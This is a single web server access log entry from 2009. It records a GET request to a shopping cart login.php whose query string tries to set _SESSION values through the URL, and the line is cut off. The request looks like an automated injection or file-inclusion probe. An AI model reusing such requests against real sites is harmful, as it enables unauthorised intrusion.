201.232.54.48 - - [21/Jun/2009:12:44:45 -0700] "GET /logs/access_090125.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5B